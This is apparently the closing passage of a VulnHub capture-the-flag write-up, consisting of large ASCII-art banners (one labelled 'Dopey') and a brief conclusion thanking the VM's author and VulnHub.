!!!!!!!!!,'!!! 4ML $$$$$$$$$.`$$$$$ ::::. " " .JMMMMMMMMMMMMMMMMMM
`!!!!!!!!! !!! JMM ?$$$$$$$$h $$$$$.:::'` MMMMMMMMMMMMMMMMMMM
<!!!!!!!> !!! MMM <$$$$$$$$$c`$$$$h ::.:: h )MMMMMMMMMMMMMMMMMM
!!!!!!!> !!> MMM <$$$$$$$$$$.<$$$$$c,```,z$ JMMMMMMMMMMMMMMMMMP
`!!!!! !! ;MMM.`"$$$$$$$$$$J$$F?$$$$$??" ,MMMMMMMMMMMMMMMMM"
`!!!! !! MMMML "$$$$$$$$$$$$= `"""" .,nMMMMMMMMMMMMMMPMM"
! '!!!, ` JMMMMMmn."?$$$$$$$P"",JMMMMMMMMMMMMMMMMMMMMMM' P"
;!> <!!!> ;P)MMMMMMMn,. """",xnMMMMMMMMMMMMMMMMMMMMMMMM' "
!!!!;!!! ,P 4MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM'
;!!!!!!!! ; 4MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP'
;!!!!!!!!!! ' MMMPMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP'
!!!!!!!!!!!!!' "Mx`"MMMMMMMMMMMMMMMMMMMMMMMMMP""
!!!!!!!!!!!!!' "F. 4MMMMMMMMMMMMMMMP""""
.!!!!!!!!!!!!' ""4MMMMMPPPPPP""
!!!!!!!!!!!! """
!!!!!!!!!'
`'''''
Dopey
;;!!!;.
;!!!!!!!!!
;!!!!!!!!!!!
<!!!!!!!!!!!!!>. .,,,;;;;;;,,,. .,;;;;;;;;;.
!!!!!!!!!!!!!!!!!; .;;!!!!!!!!!!!!!!!!'' ,;!!!!!!!!!''!!!!!.
!!!!!!!!!!!!!!!!!' . ,;!!!!!!!!!!!!!!!!!!''.;!!!!!'`` .;;;;;.``!!>
!!!!!!!!!!!!!!!' ;';!!!!!!!!!!!!!!!!!!!'',;!!!!'` ,c$$$c <!!!!!!> !!!
!!!!!!!!!!!!!(;<!><!!!!!!!!!!!!!!!!!!! ;!!!!!' zc$$$$$$$h '!!!!!!>`!!
<!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ;!!!!''.z$$$$$$$$$$$$ `!!!!!>,!!
`<!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!';<!!!' ,J$$$$$$P"""""$$h <!!!! <'
`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!,!!!! cd$$$$$$$$ z$$cc?$$, !!! ;`
`!!!!!<!!!!!!!!!!!!!!!!!!!!!!!,!!!! `""$$$$$$$$J$???$$$$h !!!'
`!!! <!!!!'!!!!!!!!!!!!!!!!!!!!!',c$$cc$$$$$$$$$ ,$$$$$ !' .==c
`!> !!!! !!!!!!!!!!!!!!!!!!!!!' $$FF"??$$$$$$$P J$$$$$ ,c$$
` !!' <!!!!!!!!!!!!!!!!!!!! <$$ J$$$$$$$ J$.<$$$$P ,",$$$"
!! `'!!!!!!!!!!!!!!!!!' zcd$F zc,`?$$$$$'J$$h $$$$F <$$$F
.,cc,,. ``<!!!!!!!!!! .J$$$$ <$$$h $$$$$ $$$F<$$$$ $$$"
.J$$$$$$$$cc, `'!!!!' z$$$$$$ <$$$$,?$$$$ "`?F<$$$F -c$$"
J$"" """?$$$$c, `` ,c$$$$$$$$L`$???><$$$$. ")$$.. "?.
$$z$$$c,. `?$$$h. J$$$$$$$$$$$, J$$$$$ ?$$$$$$h.
$$$$$$$$$$$c, `"$$c $$$$$$Cc===' z$$P"",ccdcc ??""$$$,
`$$$$$$$$$$$$$c "$$hJ$$$$$$Ccccccccc$$FF<$$$$$$$ . .,$$$>
`$$$$$$$$$$$$$ ?."$$$$$$$$$$$$$$$$$$$ zJ$$$$$P" ,",$$$$$'
"$$$$$$$$$$$ `$c$$$$$$$$$$$PPPP??".. """""_,=".J$$$$P'
"$$$$$$$$$$. ?"J$$$$$$" =cc$$$$ccc$??' J$$$P"
"?$$$$$$$$hJ $$$$$$Licc, `"""???""" zP""'
`"?$$$$$$ $$$$$$$$$$$h. .. J"
;!>; `$$$$$ `$$$$$$$$$F?$c <!; ;;; F
;!!!' , "?" ,;;.`"?????- `"=.`'''''`,"
!!!! <!!!- ;!!!!!!; .,.,,,. `"====="
!!!! `'` > ,;. ``<!!, "$$$$$F ;;
`!!!;,,;; ;!!!!>;.`!!>,"?$$" ;!!
``'''`` !'''!!!!><!!!;, " <!! !>
'` `'!!!!!!!!!>;;;,,;!!!
`!!!!!!!!!!!!!!!''
``!!!!!!;,.``,,
`<!!!!!!!!!!
```<!!!'
Conclusion
Wow - what a fun VM. This one gave me quite the run around, but was very satisfying when I finally cracked it.
Thank you Sagi, and of course, thank you VulnHub.
Until next time!